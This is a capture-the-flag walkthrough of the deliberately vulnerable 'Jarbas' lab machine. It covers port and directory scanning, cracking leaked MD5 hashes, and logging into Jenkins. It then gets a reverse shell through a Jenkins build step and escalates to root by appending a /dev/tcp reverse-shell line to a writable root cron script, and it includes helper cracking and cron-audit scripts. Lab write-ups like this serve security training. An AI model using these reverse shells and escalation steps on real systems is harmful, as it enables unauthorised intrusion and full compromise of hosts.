JARBAS
Host discovery

```
kali@kali:~$ sudo nmap -sn 192.168.19.0/24
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:52 EST
Nmap scan report for 192.168.19.1
Host is up (0.00022s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.19.2
Host is up (0.00026s latency).
MAC Address: 00:50:56:FF:BF:31 (VMware)
Nmap scan report for 192.168.19.178
Host is up (0.00026s latency).
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Nmap scan report for 192.168.19.254
Host is up (0.00021s latency).
MAC Address: 00:50:56:FB:15:2E (VMware)
Nmap scan report for 192.168.19.131
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 15.07 seconds
```
.131 is the Kali box itself (nmap prints no MAC address for the local host), and .1, .2 and .254 carry the VMware host-side MAC prefix 00:50:56, i.e. the virtual network's gateway and DHCP infrastructure. That leaves .178 (00:0C:29, a VMware guest) as the target.
Open port scan

```
kali@kali:~$ sudo nmap --min-rate 10000 -p- 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:54 EST
Nmap scan report for 192.168.19.178
Host is up (0.000091s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql
8080/tcp open  http-proxy
MAC Address: 00:0C:29:CC:AB:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds
```
Deeper scan of the open ports

```
kali@kali:~$ sudo nmap -sT -sV -O -p22,80,3306,8080 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:56 EST
Nmap scan report for 192.168.19.178
Host is up (0.0024s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
3306/tcp open  mysql   MariaDB (unauthorized)
8080/tcp open  http    Jetty 9.4.z-SNAPSHOT
MAC Address: 00:0C:29:CC:AB:79 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.63 seconds

kali@kali:~$ sudo nmap -sU -p22,80,3306,8080 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:58 EST
Nmap scan report for 192.168.19.178
Host is up (0.00027s latency).

PORT     STATE  SERVICE
22/udp   closed ssh
80/udp   closed http
3306/udp closed mysql
8080/udp closed http-alt
MAC Address: 00:0C:29:CC:AB:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 6.79 seconds

kali@kali:~$ sudo nmap --script=vuln -p22,80,3306,8080 192.168.19.178
Starting Nmap 7.93 ( https://nmap.org ) at 2022-12-03 09:58 EST
Nmap scan report for 192.168.19.178
Host is up (0.00085s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-trace: TRACE is enabled
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
3306/tcp open  mysql
8080/tcp open  http-proxy
| http-enum:
|_  /robots.txt: Robots file
MAC Address: 00:0C:29:CC:AB:79 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 41.98 seconds
```
The vuln scripts turn up nothing directly exploitable (TRACE being enabled on port 80 is a low-severity finding at most). Port 8080 is Jetty, and its robots.txt is the one Jenkins ships with (it asks crawlers not to click "build" links), which identifies 8080 as a Jenkins instance. Open it in a browser and take a look.
Saved here for reference:

```
# we don't want robots to click "build" links
```
Foothold

Directory brute-forcing

```
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.19.178 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.19.178
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Timeout:                 10s
===============================================================
2022/12/03 10:13:47 Starting gobuster in directory enumeration mode
===============================================================
Progress: 22683 / 62285 (36.42%)[ERROR] 2022/12/03 10:13:49 [!] parse "http://192.168.19.178/error\x1f_log": net/url: invalid control character in URL
Progress: 58726 / 62285 (94.29%)===============================================================
2022/12/03 10:13:53 Finished
===============================================================

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.19.178 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.19.178
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.3
[+] Extensions:              html,php
[+] Timeout:                 10s
===============================================================
2022/12/03 10:15:12 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 32808]
/access.html          (Status: 200) [Size: 359]
/.html                (Status: 403) [Size: 207]
Progress: 65315 / 186855 (34.95%)[ERROR] 2022/12/03 10:15:20 [!] parse "http://192.168.19.178/besalu\t.html": net/url: invalid control character in URL
[ERROR] 2022/12/03 10:15:20 [!] parse "http://192.168.19.178/besalu\t.php": net/url: invalid control character in URL
Progress: 69445 / 186855 (37.17%)[ERROR] 2022/12/03 10:15:21 [!] parse "http://192.168.19.178/error\x1f_log": net/url: invalid control character in URL
[ERROR] 2022/12/03 10:15:21 [!] parse "http://192.168.19.178/error\x1f_log.html": net/url: invalid control character in URL
[ERROR] 2022/12/03 10:15:21 [!] parse "http://192.168.19.178/error\x1f_log.php": net/url: invalid control character in URL
/.html                (Status: 403) [Size: 207]
/index.html           (Status: 200) [Size: 32808]
/.html                (Status: 403) [Size: 207]
Progress: 185050 / 186855 (99.03%)===============================================================
2022/12/03 10:15:34 Finished
===============================================================
```
Findings:
/index.html
/access.html
/index.html is just the landing page and holds nothing of value. access.html is the interesting one:
```
Creds encrypted in a safe way!

tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
```
"Creds encrypted in a safe way", supposedly. Each value is 32 hex characters, the shape of an unsalted MD5 digest. MD5 is a hash, not encryption, so there is nothing to decrypt: the plaintexts are recovered by hashing candidate words and comparing, which is what an online MD5 lookup or hashcat -m 0 does. If the format is not obvious by eye, hash-identifier will point at MD5.
Running the three digests through a wordlist lookup gives:
```
tiago:italia99
trindade:vipsu
eder:marianna
```
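The identification and lookup steps above, as an added example that is not part of the original writeup: it flags each 32-hex-character value as a likely MD5 digest the way hash-identifier does, then runs a dictionary attack by hashing every candidate once and looking the digests up in that table. The access.html contents are the ones shown on this page; the candidate wordlist (the three recovered plaintexts plus filler) and the demo credential in the usage note are constructed for the example.

```python
"""Identify and crack the access.html digests offline (added example)."""
import hashlib
import re

# access.html as shown in the writeup: one user:hash per line.
ACCESS_HTML = """\
Creds encrypted in a safe way!
tiago:5978a63b4654c73c60fa24f836386d87
trindade:f463f63616cb3f1e81ce46b39f882fd5
eder:9b38e2b1e8b12f426b0d208a7ab6cb98
"""

# Constructed mini wordlist: the writeup's recovered plaintexts plus filler.
WORDLIST = ["password", "123456", "jenkins", "italia99", "vipsu", "marianna"]

CRED_RE = re.compile(r"^(\w+):([0-9a-fA-F]{32})$")


def parse_creds(text):
    """Return [(user, hash)] for every line shaped like user:<32 hex chars>."""
    creds = []
    for line in text.splitlines():
        m = CRED_RE.match(line.strip())
        if m:
            creds.append((m.group(1), m.group(2).lower()))
    return creds


def identify(digest):
    """Length/alphabet based guess, the same heuristic hash-identifier uses.

    32 hex characters is MD5 in practice, but NTLM and other 128-bit digests
    look identical, so the answer is a candidate, not a certainty.
    """
    if re.fullmatch(r"[0-9a-f]{32}", digest):
        return "MD5 (or another 128-bit digest such as NTLM)"
    if re.fullmatch(r"[0-9a-f]{40}", digest):
        return "SHA-1"
    if re.fullmatch(r"[0-9a-f]{64}", digest):
        return "SHA-256"
    return "unknown"


def crack_md5(creds, wordlist):
    """Dictionary attack: hash each candidate once, then look every digest up.

    Because the digests are unsalted, identical passwords hash identically and
    one precomputed table serves all users. Users whose password is not in the
    wordlist map to None; nothing is being 'decrypted'.
    """
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(digest) for user, digest in creds}


if __name__ == "__main__":
    creds = parse_creds(ACCESS_HTML)
    for user, digest in creds:
        print(f"{user}: {digest} looks like {identify(digest)}")
    for user, pw in crack_md5(creds, WORDLIST).items():
        print(f"{user}:{pw if pw else '<not in wordlist>'}")
```

The same functions work on any dump in the same user:hash shape; swap WORDLIST for a real list such as rockyou.txt once the format is confirmed, or hand the digests to hashcat -m 0 for anything beyond a few thousand candidates.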
Trying the recovered usernames and passwords against the Jenkins login on port 8080, in every combination rather than only as the pairs listed, shows that eder with the password vipsu logs in.
Getting a low-privilege shell
Jenkins runs build steps under its own service account, so a new freestyle project with a command-running build step gives code execution on the host. We already know the target is Linux, so the first build-step option, "Execute Windows batch command", is useless here; use "Execute shell" and put a reverse shell in it.
Start a listener on Kali, trigger the build, and the callback arrives:
```
kali@kali:~$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.19.131] from (UNKNOWN) [192.168.19.178] 39862
bash: no job control in this shell
bash-4.2$ whoami
whoami
jenkins
bash-4.2$ uname -a
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ ip a
ip a
bash-4.2$ ifconfig
ifconfig
bash-4.2$ dpkg -l
dpkg -l
bash: dpkg: command not found
bash-4.2$ sudo -l
sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$
```
The shell is limited: there is no tty, so sudo -l cannot even prompt, and dpkg is missing because the host is CentOS (rpm is the package manager there). Before reaching for kernel exploits, check the scheduled tasks.
```
bash-4.2$ cat /etc/cron.d
cat /etc/cron.d
cat: /etc/cron.d: Is a directory
bash-4.2$ cat /etc/crontabs
cat /etc/crontabs
cat: /etc/crontabs: No such file or directory
bash-4.2$ cat /etc/crontab
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root

# For details see man 4 crontabs

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name  command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
bash-4.2$ cat /etc/script/CleaningScript.sh
cat /etc/script/CleaningScript.sh
#!/bin/bash

rm -rf /var/log/httpd/access_log.txt
bash-4.2$
```
The crontab has a single job: /etc/script/CleaningScript.sh runs as root every five minutes, with its output discarded. If the jenkins user can write to that script, anything appended to it executes as root on the next run; check with ls -l /etc/script/CleaningScript.sh before relying on it (the append below completing without a permission error confirms the script is writable).
Start a listener on a second port and append a bash reverse-shell line to the script:
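Generalising the manual /etc/crontab read above, as an added example that is not part of the original writeup: it parses system-crontab lines (the seven-field format with a user column, plus @daily-style shortcuts), pulls the absolute paths out of each command, and reports the ones the current account can modify, which is exactly the condition the privilege escalation depends on. The sample crontab embeds the real Jarbas entry together with two constructed decoy jobs; the writability check is injectable so the logic can be exercised without touching the real filesystem.

```python
"""Report root cron jobs whose command paths the current user can write (added example)."""
import glob
import os
import shlex

# Constructed sample: the Jarbas entry plus two made-up decoy jobs.
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
0 3 * * * root /usr/sbin/logrotate /etc/logrotate.conf
@daily root /usr/local/bin/backup.sh
"""


def parse_system_crontab(text):
    """Return [(schedule, user, command)] for each job line.

    System crontabs (/etc/crontab, /etc/cron.d/*) have a user field between
    the five schedule fields and the command; @reboot/@daily entries use a
    single schedule token. Comments and VAR=value lines are skipped.
    """
    jobs = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):
            fields = line.split(None, 2)          # @daily user command
            if len(fields) == 3:
                jobs.append((fields[0], fields[1], fields[2]))
            continue
        if "=" in line.split(None, 1)[0]:        # SHELL=, PATH=, MAILTO=
            continue
        fields = line.split(None, 6)             # m h dom mon dow user command
        if len(fields) == 7:
            jobs.append((" ".join(fields[:5]), fields[5], fields[6]))
    return jobs


def find_writable_targets(text, is_writable=None):
    """Return [(user, path)] for absolute paths in cron commands that we can write.

    Every absolute-path token is checked, not just the first, because a
    writable config file read by a root job is as good as a writable script.
    Redirection targets like >/dev/null start with '>' and are skipped.
    """
    if is_writable is None:
        is_writable = lambda p: os.access(p, os.W_OK)
    hits = []
    for _schedule, user, command in parse_system_crontab(text):
        for tok in shlex.split(command):
            if tok.startswith("/") and is_writable(tok):
                hits.append((user, tok))
    return hits


if __name__ == "__main__":
    chunks = []
    for path in ["/etc/crontab", *glob.glob("/etc/cron.d/*")]:
        try:
            with open(path, errors="replace") as fh:
                chunks.append(fh.read())
        except OSError:
            pass                                 # unreadable or absent: skip
    text = "\n".join(chunks) if chunks else SAMPLE_CRONTAB
    for user, path in find_writable_targets(text):
        print(f"[!] {user} cron job uses a path we can write: {path}")
```

Run it from the low-privilege shell to list every cron-driven file worth appending to; on Jarbas it should name /etc/script/CleaningScript.sh, and on a hardened box it should print nothing.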
```
bash-4.2$ echo "/bin/bash -i >& /dev/tcp/192.168.19.131/6666 0>&1" >> /etc/script/CleaningScript.sh
<i >& /dev/tcp/192.168.19.131/6666 0>&1" >> /etc/script/CleaningScript.sh
bash-4.2$
```
Within five minutes cron runs the modified script as root, the second listener receives a root shell, and the flag is sitting in /root:
```
kali@kali:~$ nc -vlnp 6666
listening on [any] 6666 ...
connect to [192.168.19.131] from (UNKNOWN) [192.168.19.178] 34548
bash: no job control in this shell
[root@jarbas ~]# whoami
whoami
root
[root@jarbas ~]# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP qlen 1000
    link/ether 00:0c:29:cc:ab:79 brd ff:ff:ff:ff:ff:ff
    inet 192.168.19.178/24 brd 192.168.19.255 scope global dynamic ens33
       valid_lft 1127sec preferred_lft 1127sec
    inet6 fe80::9114:a460:aa3:9dd5/64 scope link
       valid_lft forever preferred_lft forever
[root@jarbas ~]# ls
ls
flag.txt
[root@jarbas ~]# cat flag.txt
cat flag.txt
Hey!

Congratulations! You got it! I always knew you could do it!
This challenge was very easy, huh? =)

Thanks for appreciating this machine.

@tiagotvrs
[root@jarbas ~]#
```
Summary
An nmap scan found the open ports first. Browsing the two web ports and brute-forcing directories showed that 8080 is the login page of Jenkins, an automation (CI) server rather than a content management system. That suggested three routes: brute-force the login, look up the product's default credentials, or hunt for credentials leaked by the site itself. Directory brute-forcing on port 80 turned up access.html with MD5-hashed credentials; cracking them and spraying the resulting usernames and passwords against the Jenkins login got us into the console. Once authenticated, Jenkins exploitation is routine: a freestyle project's "Execute shell" build step runs arbitrary commands as the jenkins service account, so we used one to launch a bash reverse shell. The shell we got back was limited (no tty, so sudo could not even prompt for a password), so for privilege escalation we looked for a path that needs no knowledge of the kernel or other system internals: a root cron job running a script the jenkins user could write to, which handed us a root reverse shell.